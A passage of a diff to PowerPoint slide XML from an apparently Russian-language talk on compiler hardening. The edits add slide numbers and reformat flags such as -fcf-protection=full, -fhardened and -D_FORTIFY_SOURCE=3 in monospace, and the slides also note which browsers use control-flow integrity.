+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B0E5BCA-E256-47D3-A80D-305870EC5AB4}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>77</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -24645,6 +26306,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C81E01D8-00C7-4B77-B486-11965608EA7F}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>78</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -24936,11 +26626,51 @@
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Не проверяются jump tables, сгенерированные для `switch`-конструкций (только в CET есть `-mcet-switch`, дефолтно выключен)</a:t>
+              <a:t>Не проверяются jump tables, сгенерированные для switch-конструкций (только в CET есть </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-mcet-switch</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>, дефолтно выключен)</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E4CD95D-A9E7-40EB-80DE-89B9691FA867}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>79</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -25048,16 +26778,10 @@
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
+              <a:rPr lang="en-US" dirty="0">
                 <a:hlinkClick r:id="rId2"/>
               </a:rPr>
-              <a:t>Mitre</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t> CWE Top 25 2024</a:t>
+              <a:t>Mitre CWE Top 25 2024</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -25250,6 +26974,35 @@
           </a:prstGeom>
         </p:spPr>
       </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9BD23C0-A182-4343-A2FF-947681E88541}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>8</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -25563,35 +27316,65 @@
             <a:pPr lvl="2"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Раньше ещё нужно было указывать флаги `-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Раньше ещё нужно было указывать флаги </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>mcet</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>`, `-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>mshstk</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>` </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и `-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>mibt</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t>`,</a:t>
+              <a:t>,</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
@@ -25709,6 +27492,35 @@
               <a:rPr lang="en-US" dirty="0"/>
               <a:t> :(</a:t>
             </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6FC8E3B-7DEC-4904-91A6-29E88E1F7FEC}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>80</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -25873,10 +27685,93 @@
               </a:rPr>
               <a:t>Debian</a:t>
             </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>использует </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LLVM CFI </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>X86 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>AArch64 CFI </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>для </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>ARM</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не использует никакой вариант </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CFI</a:t>
+            </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
           </a:p>
           <a:p>
             <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8C47595-0B65-4B0B-B52F-087D9E003C62}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>81</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -25964,6 +27859,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E712A9D-7C7A-4FC8-9DF7-07C7CED672C8}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>82</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -26046,14 +27970,14 @@
           <p:nvPr>
             <p:extLst>
               <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
-                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3884600814"/>
+                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345191194"/>
               </p:ext>
             </p:extLst>
           </p:nvPr>
         </p:nvGraphicFramePr>
         <p:xfrm>
-          <a:off x="1270746" y="1018091"/>
-          <a:ext cx="9650508" cy="5578290"/>
+          <a:off x="961464" y="1018091"/>
+          <a:ext cx="10051677" cy="5578290"/>
         </p:xfrm>
         <a:graphic>
           <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
@@ -26062,28 +27986,28 @@
                 <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
               </a:tblPr>
               <a:tblGrid>
-                <a:gridCol w="2012576">
+                <a:gridCol w="2096238">
                   <a:extLst>
                     <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                       <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4226136556"/>
                     </a:ext>
                   </a:extLst>
                 </a:gridCol>
-                <a:gridCol w="3272118">
+                <a:gridCol w="3408139">
                   <a:extLst>
                     <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                       <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1905133483"/>
                     </a:ext>
                   </a:extLst>
                 </a:gridCol>
-                <a:gridCol w="2483223">
+                <a:gridCol w="2586450">
                   <a:extLst>
                     <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                       <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4013930117"/>
                     </a:ext>
                   </a:extLst>
                 </a:gridCol>
-                <a:gridCol w="1882591">
+                <a:gridCol w="1960850">
                   <a:extLst>
                     <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                       <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="697534993"/>
@@ -26685,7 +28609,7 @@
                     <a:p>
                       <a:r>
                         <a:rPr lang="ru-RU" dirty="0"/>
-                        <a:t>Встроенные проверки</a:t>
+                        <a:t>Уже есть в языке</a:t>
                       </a:r>
                       <a:endParaRPr lang="en-US" dirty="0"/>
                     </a:p>
@@ -27117,6 +29041,35 @@
           </a:graphicData>
         </a:graphic>
       </p:graphicFrame>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Slide Number Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB54BA1-1A2C-46CA-B92D-4456CBEF3D1B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>83</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -27201,6 +29154,35 @@
           </a:p>
         </p:txBody>
       </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDF60EB6-4D51-481C-9223-8D6829AF904C}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="12"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{9077AC13-74B0-42BB-979A-B4FD3BCA574B}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:t>84</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
@@ -27282,7 +29264,7 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
+            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
@@ -27319,7 +29301,18 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>стека при выходе из функции (-fstrub)</a:t>
+              <a:t>стека при выходе из функции (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-fstrub</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -27333,7 +29326,10 @@
               <a:t>(</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>-fzero-call-used-regs</a:t>
             </a:r>
             <a:r>
@@ -27361,11 +29357,17 @@
           </a:p>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>-</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>fhardened</a:t>
             </a:r>
             <a:r>
@@ -27462,7 +29464,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>можно посмотреть функцию `</a:t>
+              <a:t>можно посмотреть функцию </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
@@ -27474,100 +29476,167 @@
             <a:pPr lvl="2"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>На 2025 год</a:t>
+              <a:t>Сейчас</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
               <a:t>: </a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>-</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>D_FORTIFY_SOURCE=3 -D_GLIBCXX_ASSERTIONS -</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>ftrivial</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>-auto-var-</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>init</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>=zero -</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>fPIE</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -Wl,-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>z,now</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t> -Wl,-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>z,relro</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t> -</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Wl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>,-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>z,now</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Wl</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>,-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>z,relro</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>fstack</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>-protector-strong -</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>fstack</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>-clash-protection -</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>fcf</a:t>
             </a:r>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
               <a:t>-protection=full</a:t>
             </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Slide Number Placeholder 3">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26F0C61A-D298-401E-8D62-8688B8F32571}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
